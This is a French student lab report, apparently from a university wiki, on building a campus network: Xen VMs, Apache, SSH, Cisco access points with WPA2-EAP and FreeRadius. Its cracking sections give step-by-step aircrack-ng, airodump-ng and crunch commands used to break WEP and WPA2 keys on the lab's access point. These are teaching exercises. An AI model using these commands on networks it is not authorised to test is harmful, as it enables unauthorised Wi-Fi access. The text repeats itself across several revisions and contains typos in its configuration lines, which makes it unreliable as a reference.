Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

[https://ima2a5-mol-ish.site _]

TP sysres IMA2a5 2019/2020 G6

2019-11-28T19:48:19Z

Jcabrald :

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 14, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_VM_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // remplacer groupe6 par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour nous, groupe6="IMA2a5_4fun". [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7 [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun" [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles.

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise en place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCP===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupe6 /goupe6 = "IMA2a5-4fun"
network 10.60.7.0
ns-server celui_de_polytech
ip dhcp pool IMA2a5-4fun excluded-address 10.60.7.252 10.60.7.254

Ca n'a pas marché sur la borne. On le fait donc sur le routeur.

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

[https://ima2a5-mol-ish.site https://ima2a5-mol-ish.site ,]

TP sysres IMA2a5 2019/2020 G6

2019-11-28T19:45:15Z

Jcabrald :

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 14, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_VM_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // remplacer groupe6 par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour nous, groupe6="IMA2a5_4fun". [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7 [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun" [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles.

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise en place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCP===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupe6 /goupe6 = "IMA2a5-4fun"
network 10.60.7.0
ns-server celui_de_polytech
ip dhcp pool IMA2a5-4fun excluded-address 10.60.7.252 10.60.7.254

Ca n'a pas marché sur la borne. On le fait donc sur le routeur.

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

[https://ima2a5-mol-ish.site https://ima2a5-mol-ish.site] _

TP sysres IMA2a5 2019/2020 G6

2019-11-28T19:44:55Z

Jcabrald :

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

